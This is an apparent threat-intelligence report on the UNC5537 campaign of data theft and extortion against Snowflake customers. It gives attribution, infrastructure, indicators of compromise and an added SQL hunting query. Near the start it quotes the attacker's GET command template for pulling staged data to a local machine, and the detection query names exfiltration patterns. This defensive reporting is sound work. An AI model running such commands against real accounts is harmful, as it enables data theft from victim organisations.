
UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion


Finally, UNC5537 utilized the GET command to exfiltrate data from the temporary stages to locally specified directories.

GET @<target stage and filepath> file:///<Attacker Local Machine Path>;

UNC5537 Attribution

Mandiant has been tracking UNC5537, a financially motivated threat actor, as a distinct cluster since May 2024. UNC5537 has targeted hundreds of organizations worldwide, and frequently extorts victims for financial gain. UNC5537 operates under various aliases on Telegram channels and cybercrime forums. Mandiant has identified members having associations to other tracked groups. Mandiant assesses with moderate confidence that UNC5537 comprises members based in North America, and collaborates with an additional member in Turkey.

Attacker Infrastructure

UNC5537 primarily used Mullvad or Private Internet Access (PIA) VPN IP addresses to access victim Snowflake instances. When exfiltrating data, Mandiant observed the use of VPS systems from ALEXHOST SRL (AS200019), a Moldovan provider. UNC5537 was observed storing stolen victim data on several international VPS providers as well as the cloud storage provider MEGA.

Outlook & Implications

UNC5537’s campaign against Snowflake customer instances is not the result of any particularly novel or sophisticated tool, technique, or procedure. This campaign’s broad impact is the consequence of the growing infostealer marketplace and missed opportunities to further secure credentials:
  • UNC5537 was likely able to aggregate credentials for Snowflake victim instances by accessing a variety of different sources of infostealer logs. The underground infostealer economy is also extremely robust, and large lists of stolen credentials exist both for free and for purchase inside and outside of the dark web.
  • The affected customer instances did not require multi-factor authentication, and in many cases the credentials had not been rotated for as long as four years. Network allow lists were also not used to limit access to trusted locations.

This campaign highlights the consequences of vast amounts of credentials circulating on the infostealer marketplace and may be representative of a specific focus by threat actors on similar SaaS platforms. Mandiant assesses UNC5537 will continue this pattern of intrusion, targeting additional SaaS platforms in the near future.

The broad impact of this campaign underscores the urgent need for credential monitoring, the universal enforcement of MFA and secure authentication, limiting traffic to trusted locations for crown jewels, and alerting on abnormal access attempts. For further recommendations on how to harden Snowflake environments, please see Snowflake’s Hardening Guide.

Indicators of Compromise (IOCs)

Google Threat Intelligence Collection of IPs

A Google Threat Intelligence Collection of IPs is available.

Client Application IDs

  • Rapeflake
  • DBeaver_DBeaverUltimate
  • Go 1.1.5
  • JDBC 3.13.30
  • JDBC 3.15.0
  • PythonConnector 2.7.6
  • SnowSQL 1.2.32
  • Snowflake UI
  • Snowsight Al

Additional IOCs are available in Snowflake’s updated blog post.
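As an added hunting example (not part of the Mandiant report or Snowflake's guidance), the following Snowflake SQL searches the SNOWFLAKE.ACCOUNT_USAGE views for sessions whose reported client application matches the IDs listed above and for the staging and GET activity described earlier run inside those sessions. It assumes access to the ACCOUNT_USAGE share, a 30-day lookback, and that the two browser client IDs (Snowflake UI, Snowsight) are hunted separately by source IP because they match every legitimate web user.

```sql
-- Added example: hunt for UNC5537-style sessions and exfiltration in ACCOUNT_USAGE.
-- Assumptions: ACCOUNTADMIN (or granted) access to SNOWFLAKE.ACCOUNT_USAGE,
-- 30-day window. ACCOUNT_USAGE views lag live activity by up to a few hours.
WITH suspicious_sessions AS (
    SELECT s.session_id,
           s.created_on,
           s.user_name,
           s.client_application_id,
           s.authentication_method,
           l.client_ip,
           l.second_authentication_factor
    FROM snowflake.account_usage.sessions AS s
    LEFT JOIN snowflake.account_usage.login_history AS l
           ON l.event_id = s.login_event_id
    WHERE s.created_on >= DATEADD('day', -30, CURRENT_TIMESTAMP())
      -- Client application IDs from the IOC list above; compared case-insensitively.
      -- 'Snowflake UI' and 'Snowsight' are omitted here: they match every browser
      -- user, so review those by client_ip against your allow list instead.
      AND LOWER(s.client_application_id) IN (
            'rapeflake',
            'dbeaver_dbeaverultimate',
            'go 1.1.5',
            'jdbc 3.13.30',
            'jdbc 3.15.0',
            'pythonconnector 2.7.6',
            'snowsql 1.2.32'
          )
)
-- Queries issued from those sessions that stage data (COPY INTO @stage),
-- or pull it to a local path (GET @stage file:///...), as described in the report.
SELECT ss.user_name,
       ss.client_ip,
       ss.client_application_id,
       ss.authentication_method,
       ss.second_authentication_factor,   -- NULL here means the login had no MFA
       q.start_time,
       q.query_type,
       q.query_text
FROM suspicious_sessions AS ss
JOIN snowflake.account_usage.query_history AS q
  ON q.session_id = ss.session_id
WHERE q.query_type IN ('GET_FILES', 'UNLOAD')
   OR q.query_text ILIKE 'GET @%file://%'
   OR q.query_text ILIKE 'COPY INTO @%'
ORDER BY q.start_time;
```

Rows with a NULL second_authentication_factor from a VPN or VPS address are the pattern the report describes; the same join, without the client ID filter, gives a baseline for alerting on GET and COPY INTO @stage from any new source IP.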

Published: 2024-06-10T10:00:00
